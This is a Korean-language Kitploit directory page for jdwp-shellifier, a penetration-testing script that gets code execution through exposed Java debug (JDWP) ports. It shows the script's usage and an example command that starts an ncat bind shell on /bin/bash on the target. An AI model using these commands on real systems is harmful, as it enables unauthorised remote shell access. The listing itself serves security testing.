Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
jdwp-shellifier — 노출된 Java Debug Wire Protocol(JDWP) 서비스용 악용 스크립트로, 침투 테스터가 Java 코드를 주입하고 대상 JVM에서 임의의 OS 명령을 실행할 수 있게 해줍니다. | Kitploit
도구/GitHubGitHub/ioactive/jdwp-shellifier
ExploitationDebuggersPenetration TestingMisconfiguration
GitHubioactive/jdwp-shellifier

jdwp-shellifier

노출된 Java Debug Wire Protocol(JDWP) 서비스용 악용 스크립트로, 침투 테스터가 Java 코드를 주입하고 대상 JVM에서 임의의 OS 명령을 실행할 수 있게 해줍니다.

저장소 보기
9172892년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

JDWP 익스플로잇 스크립트

무엇인가?

이 익스플로잇 스크립트는 침투 테스터가 활성 JDWP 서비스를 대상으로 원격 코드 실행(RCE)을 달성하기 위해 사용하도록 만들어졌습니다.

어떻게 동작하나요?

음, 아주 표준적인 방식으로, 이 스크립트는 Python 2 인터프리터만 필요로 합니다:

root@kitploit:~
% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

특정 호스트/포트를 대상으로 지정하려면:

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

이 명령은 JVM에 Java 코드만 주입하고 운영 체제, Java 버전과 같은 일부 정보를 표시합니다. 외부 코드/바이너리를 실행하지 않으므로 완전히 안전하며 개념 증명(Proof-Of-Concept)으로 사용할 수 있습니다.

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

이 명령은 실행 중인 JVM에 부여된 권한으로 지정된 인자와 함께 ncat 프로세스를 실제로 실행합니다.

질문을 보내기 전에 JDWP 프로토콜을 완전히 이해할 수 있도록 http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html 을 반드시 읽어보세요.

감사의 말

  • Ilja Van Sprundel
  • Sebastien Macke
도구 다운로드